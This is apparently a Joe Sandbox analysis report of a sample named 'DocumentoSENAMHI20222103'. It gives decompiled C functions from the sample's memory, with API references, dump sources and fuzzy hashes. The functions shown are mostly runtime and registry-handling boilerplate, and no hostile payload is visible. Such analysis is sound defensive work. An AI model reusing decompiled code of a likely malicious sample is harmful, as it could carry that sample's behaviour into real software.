    			E00152049(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
    				void* _t27;
    				void* _t28;
    				void* _t32;
    				void* _t33;
    				void* _t34;
    				void* _t36;
    				void* _t39;
    				void* _t44;
    				void* _t45;
    				intOrPtr* _t64;
    				void* _t65;
    				void* _t66;
    				void* _t68;
    				void* _t69;
    
    				_t62 = __edi;
    				_push(0x14);
    				E00160216(0x1607c7, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t65 - 0x1c)) = __edx;
    				 *((intOrPtr*)(_t65 - 0x20)) = __ecx;
    				_t64 = 0;
    				 *((intOrPtr*)(_t65 - 0x18)) = 0;
    				 *(_t65 - 4) =  *(_t65 - 4) & 0;
    				_t43 =  *((intOrPtr*)(_t65 + 8));
    				if( *((intOrPtr*)(_t65 + 8)) == 0) {
    					_t44 = 0x80070057;
    				} else {
    					_t26 = E001575E7(_t43) + 1;
    					 *((intOrPtr*)(_t65 - 0x14)) = E001575E7(_t43) + 1;
    					_t27 = E00151181(_t65 - 0x14, _t26);
    					_t68 = _t66 + 4;
    					if(_t27 >= 0) {
    						_t62 =  *((intOrPtr*)(_t65 - 0x14));
    						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
    						if(__eflags > 0) {
    							L6:
    							_t28 = E00153CD7(_t65 - 0x18, _t64, _t62);
    							_t64 =  *((intOrPtr*)(_t65 - 0x18));
    						} else {
    							_t39 = E001511AE(_t43, _t62, _t62, 0, __eflags);
    							__eflags = _t39;
    							if(_t39 == 0) {
    								goto L6;
    							} else {
    								E001602F0(_t62);
    								_t28 = _t68;
    							}
    						}
    						_t45 = E00151251(_t28, _t43, _t62, 3);
    					} else {
    						_t45 = 0;
    					}
    					_t31 = E001575E7(L"REGISTRY") + 1;
    					 *((intOrPtr*)(_t65 - 0x14)) = E001575E7(L"REGISTRY") + 1;
    					_t32 = E00151181(_t65 - 0x14, _t31);
    					_t69 = _t68 + 4;
    					if(_t32 >= 0) {
    						_t62 =  *((intOrPtr*)(_t65 - 0x14));
    						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
    						if(__eflags > 0) {
    							L13:
    							_t33 = E00153CD7(_t65 - 0x18, _t64, _t62);
    							_t64 =  *((intOrPtr*)(_t65 - 0x18));
    						} else {
    							_t36 = E001511AE(_t45, _t62, _t62, _t64, __eflags);
    							__eflags = _t36;
    							if(_t36 == 0) {
    								goto L13;
    							} else {
    								E001602F0(_t62);
    								_t33 = _t69;
    							}
    						}
    						_t34 = E00151251(_t33, L"REGISTRY", _t62, 3);
    					} else {
    						_t34 = 0;
    					}
    					if(_t45 == 0) {
    						L18:
    						_t44 = 0x8007000e;
    					} else {
    						_t75 = _t34;
    						if(_t34 == 0) {
    							goto L18;
    						} else {
    							_t44 = E00151B39(_t45,  *((intOrPtr*)(_t65 - 0x20)), _t62, _t64, _t75,  *((intOrPtr*)(_t65 - 0x1c)), _t45, _t34, 0);
    						}
    					}
    				}
    				if(_t64 != 0) {
    					do {
    						_t62 =  *_t64;
    						_t64 = _t62;
    						E00157188(_t64);
    					} while (_t62 != 0);
    				}
    				return E001601C5(_t44, _t62, _t64);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00152050
    • __alloca_probe_16.LIBCMT ref: 001520A5
      • Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1
    • __alloca_probe_16.LIBCMT ref: 00152103
    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00151E71(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t28;
    				void* _t29;
    				void* _t33;
    				void* _t35;
    				void* _t40;
    				void* _t44;
    				intOrPtr* _t46;
    				intOrPtr* _t64;
    				intOrPtr _t65;
    				intOrPtr* _t67;
    				void* _t68;
    				void* _t69;
    				void* _t71;
    				void* _t72;
    
    				_push(0x14);
    				E00160216(0x1607c7, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t68 - 0x1c)) = __edx;
    				 *((intOrPtr*)(_t68 - 0x20)) = __ecx;
    				_t64 = 0;
    				_t67 = 0;
    				 *((intOrPtr*)(_t68 - 0x18)) = 0;
    				 *((intOrPtr*)(_t68 - 4)) = 0;
    				if( *((intOrPtr*)(_t68 + 8)) == 0) {
    					_t44 = 0x80070057;
    				} else {
    					_t27 = E001575E7( *((intOrPtr*)(_t68 + 8))) + 1;
    					 *((intOrPtr*)(_t68 - 0x14)) = E001575E7( *((intOrPtr*)(_t68 + 8))) + 1;
    					_t28 = E00151181(_t68 - 0x14, _t27);
    					_t71 = _t69 + 4;
    					if(_t28 >= 0) {
    						_t45 =  *((intOrPtr*)(_t68 - 0x14));
    						__eflags =  *((intOrPtr*)(_t68 - 0x14)) - 0x400;
    						if(__eflags > 0) {
    							L6:
    							_t29 = E00153CD7(_t68 - 0x18, _t67, _t45);
    							_t67 =  *((intOrPtr*)(_t68 - 0x18));
    						} else {
    							_t40 = E001511AE(_t45, _t45, 0, 0, __eflags);
    							__eflags = _t40;
    							if(_t40 == 0) {
    								goto L6;
    							} else {
    								E001602F0(_t45);
    								_t29 = _t71;
    							}
    						}
    						_t46 = E00151251(_t29,  *((intOrPtr*)(_t68 + 8)), _t45, 3);
    					} else {
    						_t46 = 0;
    					}
    					_t32 = E001575E7(L"REGISTRY") + 1;
    					 *((intOrPtr*)(_t68 - 0x14)) = E001575E7(L"REGISTRY") + 1;
    					_t33 = E00151181(_t68 - 0x14, _t32);
    					_t72 = _t71 + 4;
    					if(_t33 >= 0) {
    						_t65 =  *((intOrPtr*)(_t68 - 0x14));
    						_t77 = _t65 - 0x400;
    						if(_t65 > 0x400 || E001511AE(_t46, _t65, _t65, _t67, _t77) == 0) {
    							_t35 = E00153CD7(_t68 - 0x18, _t67, _t65);
    							_t67 =  *((intOrPtr*)(_t68 - 0x18));
    						} else {
    							E001602F0(_t65);
    							_t35 = _t72;
    						}
    						_t64 = E00151251(_t35, L"REGISTRY", _t65, 3);
    					}
    					if(_t46 == 0) {
    						L17:
    						_t44 = 0x8007000e;
    					} else {
    						_t80 = _t64;
    						if(_t64 == 0) {
    							goto L17;
    						} else {
    							_t44 = E00151B39(_t46,  *((intOrPtr*)(_t68 - 0x20)), _t64, _t67, _t80,  *((intOrPtr*)(_t68 - 0x1c)), _t46, _t64, 1);
    						}
    					}
    				}
    				if(_t67 != 0) {
    					do {
    						_t64 =  *_t67;
    						_t67 = _t64;
    						E00157188(_t67);
    					} while (_t64 != 0);
    				}
    				return E001601C5(_t44, _t64, _t67);
    			}

    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00155EBA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int* _t52;
    				signed int _t53;
    				intOrPtr _t54;
    				signed int _t58;
    				signed int _t61;
    				intOrPtr _t71;
    				signed int _t75;
    				signed int _t79;
    				signed int _t81;
    				signed int _t84;
    				signed int _t85;
    				signed int _t97;
    				signed int* _t98;
    				signed char* _t101;
    				signed int _t107;
    				void* _t111;
    
    				_push(0x10);
    				_push(0x167098);
    				E00154730(__ebx, __edi, __esi);
    				_t75 = 0;
    				_t52 =  *(_t111 + 0x10);
    				_t81 = _t52[1];
    				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
    					L30:
    					_t53 = 0;
    					__eflags = 0;
    					goto L31;
    				} else {
    					_t97 = _t52[2];
    					if(_t97 != 0 ||  *_t52 < 0) {
    						_t84 =  *_t52;
    						_t107 =  *(_t111 + 0xc);
    						if(_t84 >= 0) {
    							_t107 = _t107 + 0xc + _t97;
    						}
    						 *(_t111 - 4) = _t75;
    						_t101 =  *(_t111 + 0x14);
    						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
    							L10:
    							_t54 =  *((intOrPtr*)(_t111 + 8));
    							__eflags = _t84 & 0x00000008;
    							if((_t84 & 0x00000008) == 0) {
    								__eflags =  *_t101 & 0x00000001;
    								if(( *_t101 & 0x00000001) == 0) {
    									_t84 =  *(_t54 + 0x18);
    									__eflags = _t101[0x18] - _t75;
    									if(_t101[0x18] != _t75) {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												__eflags =  *_t101 & 0x00000004;
    												_t79 = 0;
    												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
    												__eflags = _t75;
    												 *(_t111 - 0x20) = _t75;
    												goto L29;
    											}
    										}
    									} else {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												E001556D0(_t107, E00155496(_t84,  &(_t101[8])), _t101[0x14]);
    												goto L29;
    											}
    										}
    									}
    								} else {
    									__eflags =  *(_t54 + 0x18);
    									if( *(_t54 + 0x18) == 0) {
    										goto L32;
    									} else {
    										__eflags = _t107;
    										if(_t107 == 0) {
    											goto L32;
    										} else {
    											E001556D0(_t107,  *(_t54 + 0x18), _t101[0x14]);
    											__eflags = _t101[0x14] - 4;
    											if(_t101[0x14] == 4) {
    												__eflags =  *_t107;
    												if( *_t107 != 0) {
    													_push( &(_t101[8]));
    													_push( *_t107);
    													goto L21;
    												}
    											}
    											goto L29;
    										}
    									}
    								}
    							} else {
    								_t84 =  *(_t54 + 0x18);
    								goto L12;
    							}
    						} else {
    							_t71 =  *0x292740; // 0x0
    							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
    							if(_t71 == 0) {
    								goto L10;
    							} else {
    								 *0x161278();
    								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
    								L12:
    								if(_t84 == 0 || _t107 == 0) {
    									L32:
    									E00158A26(_t75, _t84, _t97, _t101, _t107);
    									asm("int3");
    									_push(8);
    									_push(0x1670b8);
    									E00154730(_t75, _t101, _t107);
    									_t98 =  *(_t111 + 0x10);
    									_t85 =  *(_t111 + 0xc);
    									__eflags =  *_t98;
    									if(__eflags >= 0) {
    										_t103 = _t85 + 0xc + _t98[2];
    										__eflags = _t85 + 0xc + _t98[2];
    									} else {
    										_t103 = _t85;
    									}
    									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
    									_t108 =  *(_t111 + 0x14);
    									_push( *(_t111 + 0x14));
    									_push(_t98);
    									_push(_t85);
    									_t77 =  *((intOrPtr*)(_t111 + 8));
    									_push( *((intOrPtr*)(_t111 + 8)));
    									_t58 = E00155EBA(_t77, _t103, _t108, __eflags) - 1;
    									__eflags = _t58;
    									if(_t58 == 0) {
    										_t61 = E00156BC0(_t103, _t108[0x18], E00155496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
    									} else {
    										_t61 = _t58 - 1;
    										__eflags = _t61;
    										if(_t61 == 0) {
    											_t61 = E00156BD0(_t103, _t108[0x18], E00155496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
    										}
    									}
    									 *(_t111 - 4) = 0xfffffffe;
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t61;
    								} else {
    									 *_t107 = _t84;
    									_push( &(_t101[8]));
    									_push(_t84);
    									L21:
    									 *_t107 = E00155496();
    									L29:
    									 *(_t111 - 4) = 0xfffffffe;
    									_t53 = _t75;
    									L31:
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t53;
    								}
    							}
    						}
    					} else {
    						goto L30;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: c909967e20af84fc33e0822522d4695dd96080b323b5a71f6002726be67f817b
    • Instruction ID: c4fec75e1e888b322c400bf4638fee26083fa602b8df5b0c86e71eda3e83d1a6
    • Opcode Fuzzy Hash: c909967e20af84fc33e0822522d4695dd96080b323b5a71f6002726be67f817b
    • Instruction Fuzzy Hash: 5151E371605A12EFDB288F50D861B6AB7A6EF14312F24442EFC318F690E731AC89C790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00159F50(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t16;
    				intOrPtr _t17;
    				intOrPtr _t19;
    				intOrPtr _t29;
    				char _t31;
    				intOrPtr _t38;
    				intOrPtr* _t40;
    				intOrPtr _t41;
    
    				_t40 = _a4;
    				if(_t40 != 0) {
    					_t31 = 0;
    					__eflags =  *_t40;
    					if( *_t40 != 0) {
    						_t16 = E0015B146(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t16;
    						if(__eflags != 0) {
    							_t38 = _a8;
    							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
    							if(__eflags <= 0) {
    								L11:
    								_t17 = E0015B146(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
    								__eflags = _t17;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
    									_t19 = 0;
    									__eflags = 0;
    								} else {
    									E0015759E(GetLastError());
    									_t19 =  *((intOrPtr*)(E001575D4(__eflags)));
    								}
    								L14:
    								return _t19;
    							}
    							_t19 = E0015A58C(_t38, __eflags, _t16);
    							__eflags = _t19;
    							if(_t19 != 0) {
    								goto L14;
    							}
    							goto L11;
    						}
    						E0015759E(GetLastError());
    						return  *((intOrPtr*)(E001575D4(__eflags)));
    					}
    					_t41 = _a8;
    					__eflags =  *((intOrPtr*)(_t41 + 0xc));
    					if(__eflags != 0) {
    						L6:
    						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
    						L2:
    						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
    						return 0;
    					}
    					_t29 = E0015A58C(_t41, __eflags, 1);
    					__eflags = _t29;
    					if(_t29 != 0) {
    						return _t29;
    					}
    					goto L6;
    				}
    				_t41 = _a8;
    				E0015A572(_t41);
    				_t31 = 0;
    				 *((intOrPtr*)(_t41 + 8)) = 0;
    				 *((intOrPtr*)(_t41 + 0xc)) = 0;
    				goto L2;
    			}












    APIs
      • Part of subcall function 0015A572: _free.LIBCMT ref: 0015A580
      • Part of subcall function 0015B146: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,0015DE4D,0000FDE9,00000000,?,?,?,0015DBC6,0000FDE9,00000000,?), ref: 0015B1F2
    • GetLastError.KERNEL32 ref: 00159FB8
    • __dosmaperr.LIBCMT ref: 00159FBF
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00159FFE
    • __dosmaperr.LIBCMT ref: 0015A005
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: b9971c73cbd6245a2cf1e7b51d61b4cb42b5bebeafc9ed5eb820ce8355b0aeaf
    • Instruction ID: 7e3e35243a40b29dbd540e9ad85d6e70980d734ec06bf786abaa67b0a06f2181
    • Opcode Fuzzy Hash: b9971c73cbd6245a2cf1e7b51d61b4cb42b5bebeafc9ed5eb820ce8355b0aeaf
    • Instruction Fuzzy Hash: 3421C471614205EFDB20AF619C81D6B7BACEF153667508619FC35DF190E730EC449B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00151A54(void* __ebx, intOrPtr* __edi, intOrPtr* __esi, void* __eflags) {
    				struct _CRITICAL_SECTION* _t22;
    				void* _t25;
    				void* _t28;
    				void* _t29;
    				void* _t49;
    				void* _t50;
    				void* _t52;
    
    				_t48 = __esi;
    				_t47 = __edi;
    				_push(0x10);
    				E00160216(0x1607fb, __ebx, __edi, __esi);
    				_t36 =  *((intOrPtr*)(_t49 + 0xc));
    				if( *((intOrPtr*)(_t49 + 0xc)) != 0 &&  *((intOrPtr*)(_t49 + 0x10)) != 0) {
    					_t22 =  *((intOrPtr*)(_t49 + 8)) + 0x10;
    					 *(_t49 - 0x1c) = _t22;
    					EnterCriticalSection(_t22);
    					_t48 = 0;
    					 *((intOrPtr*)(_t49 - 0x18)) = 0;
    					 *((intOrPtr*)(_t49 - 4)) = 0;
    					 *((intOrPtr*)(_t49 - 0x14)) = E001575E7(_t36) + 1;
    					_t25 = E00151181(_t49 - 0x14, E001575E7(_t36) + 1);
    					_t52 = _t50 + 4;
    					if(_t25 < 0) {
    						L9:
    						_t36 = 0x8007000e;
    					} else {
    						_t47 =  *((intOrPtr*)(_t49 - 0x14));
    						_t57 = _t47 - 0x400;
    						if(_t47 > 0x400 || E001511AE(_t36, _t47, _t47, 0, _t57) == 0) {
    							_t28 = E00153CD7(_t49 - 0x18, _t48, _t47);
    							_t48 =  *((intOrPtr*)(_t49 - 0x18));
    						} else {
    							E001602F0(_t47);
    							_t28 = _t52;
    						}
    						_t29 = E00151251(_t28, _t36, _t47, 3);
    						_t59 = _t29;
    						if(_t29 == 0) {
    							goto L9;
    						} else {
    							_push( *((intOrPtr*)(_t49 + 0x10)));
    							_push(_t29);
    							_t47 = E0015175A(_t36,  *((intOrPtr*)(_t49 + 8)) + 4, _t47, _t48, _t59);
    							LeaveCriticalSection( *(_t49 - 0x1c));
    							_t36 =  !=  ? 0 : 0x8007000e;
    						}
    					}
    					if(_t48 != 0) {
    						do {
    							_t47 =  *_t48;
    							_t48 = _t47;
    							E00157188(_t48);
    						} while (_t47 != 0);
    					}
    				}
    				return E001601C5(_t36, _t47, _t48);
    			}











    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00151A5B
    • EnterCriticalSection.KERNEL32(?,00000010,0015362B,?,Module,?), ref: 00151A7F
    • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,?), ref: 00151AF9
      • Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1
    • __alloca_probe_16.LIBCMT ref: 00151AC0
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CriticalSection__alloca_probe_16$EnterH_prolog3_Leave
    • String ID:
    • API String ID: 4018831387-0
    • Opcode ID: 890f5b959c952ee3775c8869c536ab56eaa113d5e6a7ad0ecac796a32147799e
    • Instruction ID: f358545c0e53e403aec1e4bedab9307c771f1c439e3db3d7941aca58297abebf
    • Opcode Fuzzy Hash: 890f5b959c952ee3775c8869c536ab56eaa113d5e6a7ad0ecac796a32147799e
    • Instruction Fuzzy Hash: D9219D36A00205EBCB129FA8C8857AE76B5AF58302F154419ED25AF241EB74DD49CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E001590A4(void* __ecx, void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t2;
    				long _t3;
    				intOrPtr _t5;
    				long _t6;
    				intOrPtr _t9;
    				long _t10;
    				signed int _t39;
    				signed int _t40;
    				void* _t43;
    				void* _t49;
    				signed int _t51;
    				signed int _t53;
    				signed int _t54;
    				long _t56;
    				long _t60;
    				long _t61;
    				void* _t65;
    
    				_t49 = __edx;
    				_t43 = __ecx;
    				_t60 = GetLastError();
    				_t2 =  *0x169050; // 0x6
    				_t67 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E0015995D(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t51 = E00159E27(1, 0x364);
    						_pop(_t43);
    						__eflags = _t51;
    						if(__eflags != 0) {
    							__eflags = E0015995D(__eflags,  *0x169050, _t51);
    							if(__eflags != 0) {
    								E00158ED2(_t51, 0x29295c);
    								E00158B82(0);
    								_t65 = _t65 + 0xc;
    								goto L13;
    							} else {
    								_t39 = 0;
    								E0015995D(__eflags,  *0x169050, 0);
    								_push(_t51);
    								goto L9;
    							}
    						} else {
    							_t39 = 0;
    							__eflags = 0;
    							E0015995D(0,  *0x169050, 0);
    							_push(0);
    							L9:
    							E00158B82();
    							_pop(_t43);
    							goto L4;
    						}
    					}
    				} else {
    					_t51 = E0015991E(_t67, _t2);
    					if(_t51 == 0) {
    						_t2 =  *0x169050; // 0x6
    						goto L6;
    					} else {
    						if(_t51 != 0xffffffff) {
    							L13:
    							_t39 = _t51;
    						} else {
    							L3:
    							_t39 = 0;
    							L4:
    							_t51 = _t39;
    						}
    					}
    				}
    				SetLastError(_t60);
    				asm("sbb edi, edi");
    				_t53 =  ~_t51 & _t39;
    				if(_t53 == 0) {
    					E00158A26(_t39, _t43, _t49, _t53, _t60);
    					asm("int3");
    					_t5 =  *0x169050; // 0x6
    					_push(_t60);
    					__eflags = _t5 - 0xffffffff;
    					if(__eflags == 0) {
    						L22:
    						_t6 = E0015995D(__eflags, _t5, 0xffffffff);
    						__eflags = _t6;
    						if(_t6 == 0) {
    							goto L31;
    						} else {
    							_t60 = E00159E27(1, 0x364);
    							_pop(_t43);
    							__eflags = _t60;
    							if(__eflags != 0) {
    								__eflags = E0015995D(__eflags,  *0x169050, _t60);
    								if(__eflags != 0) {
    									E00158ED2(_t60, 0x29295c);
    									E00158B82(0);
    									_t65 = _t65 + 0xc;
    									goto L29;
    								} else {
    									E0015995D(__eflags,  *0x169050, _t21);
    									_push(_t60);
    									goto L25;
    								}
    							} else {
    								E0015995D(__eflags,  *0x169050, _t20);
    								_push(_t60);
    								L25:
    								E00158B82();
    								_pop(_t43);
    								goto L31;
    							}
    						}
    					} else {
    						_t60 = E0015991E(__eflags, _t5);
    						__eflags = _t60;
    						if(__eflags == 0) {
    							_t5 =  *0x169050; // 0x6
    							goto L22;
    						} else {
    							__eflags = _t60 - 0xffffffff;
    							if(_t60 == 0xffffffff) {
    								L31:
    								E00158A26(_t39, _t43, _t49, _t53, _t60);
    								asm("int3");
    								_push(_t39);
    								_push(_t60);
    								_push(_t53);
    								_t61 = GetLastError();
    								_t9 =  *0x169050; // 0x6
    								__eflags = _t9 - 0xffffffff;
    								if(__eflags == 0) {
    									L38:
    									_t10 = E0015995D(__eflags, _t9, 0xffffffff);
    									__eflags = _t10;
    									if(_t10 == 0) {
    										goto L35;
    									} else {
    										_t54 = E00159E27(1, 0x364);
    										__eflags = _t54;
    										if(__eflags != 0) {
    											__eflags = E0015995D(__eflags,  *0x169050, _t54);
    											if(__eflags != 0) {
    												E00158ED2(_t54, 0x29295c);
    												E00158B82(0);
    												goto L45;
    											} else {
    												_t40 = 0;
    												E0015995D(__eflags,  *0x169050, 0);
    												_push(_t54);
    												goto L41;
    											}
    										} else {
    											_t40 = 0;
    											__eflags = 0;
    											E0015995D(0,  *0x169050, 0);
    											_push(0);
    											L41:
    											E00158B82();
    											goto L36;
    										}
    									}
    								} else {
    									_t54 = E0015991E(__eflags, _t9);
    									__eflags = _t54;
    									if(__eflags == 0) {
    										_t9 =  *0x169050; // 0x6
    										goto L38;
    									} else {
    										__eflags = _t54 - 0xffffffff;
    										if(_t54 != 0xffffffff) {
    											L45:
    											_t40 = _t54;
    										} else {
    											L35:
    											_t40 = 0;
    											__eflags = 0;
    											L36:
    											_t54 = _t40;
    										}
    									}
    								}
    								SetLastError(_t61);
    								asm("sbb edi, edi");
    								_t56 =  ~_t54 & _t40;
    								__eflags = _t56;
    								return _t56;
    							} else {
    								L29:
    								__eflags = _t60;
    								if(_t60 == 0) {
    									goto L31;
    								} else {
    									return _t60;
    								}
    							}
    						}
    					}
    				} else {
    					return _t53;
    				}
    			}
























    APIs
    • GetLastError.KERNEL32(?,?,?,00157123,?,?,00000000,?,00159C0E,00000000,00000000,?,00000000), ref: 001590A9
    • _free.LIBCMT ref: 00159106
    • _free.LIBCMT ref: 0015913C
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00159C0E,00000000,00000000,?,00000000), ref: 00159147
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: c983c03d31fbb0429c62250d960a426ea6380ef5106283fc2ae4a389a22f4444
    • Instruction ID: 2b93e0c53199310967077fd11cd1db781a1dc485108051918f24ef6f2ab445f8
    • Opcode Fuzzy Hash: c983c03d31fbb0429c62250d960a426ea6380ef5106283fc2ae4a389a22f4444
    • Instruction Fuzzy Hash: 7A11C672204612EB9A1026B59DC5D3B226D9BD137FB290628FE399F1D1DFA18C0CC112
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E001591FB(void* __ecx) {
    				intOrPtr _t2;
    				signed int _t3;
    				signed int _t13;
    				signed int _t18;
    				long _t21;
    
    				_t21 = GetLastError();
    				_t2 =  *0x169050; // 0x6
    				_t24 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E0015995D(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t18 = E00159E27(1, 0x364);
    						__eflags = _t18;
    						if(__eflags != 0) {
    							__eflags = E0015995D(__eflags,  *0x169050, _t18);
    							if(__eflags != 0) {
    								E00158ED2(_t18, 0x29295c);
    								E00158B82(0);
    								goto L13;
    							} else {
    								_t13 = 0;
    								E0015995D(__eflags,  *0x169050, 0);
    								_push(_t18);
    								goto L9;
    							}
    						} else {
    							_t13 = 0;
    							__eflags = 0;
    							E0015995D(0,  *0x169050, 0);
    							_push(0);
    							L9:
    							E00158B82();
    							goto L4;
    						}
    					}
    				} else {
    					_t18 = E0015991E(_t24, _t2);
    					if(_t18 == 0) {
    						_t2 =  *0x169050; // 0x6
    						goto L6;
    					} else {
    						if(_t18 != 0xffffffff) {
    							L13:
    							_t13 = _t18;
    						} else {
    							L3:
    							_t13 = 0;
    							L4:
    							_t18 = _t13;
    						}
    					}
    				}
    				SetLastError(_t21);
    				asm("sbb edi, edi");
    				return  ~_t18 & _t13;
    			}









    APIs
    • GetLastError.KERNEL32(?,?,?,001575D9,0015116B), ref: 00159200
    • _free.LIBCMT ref: 0015925D
    • _free.LIBCMT ref: 00159293
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,001575D9,0015116B), ref: 0015929E
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
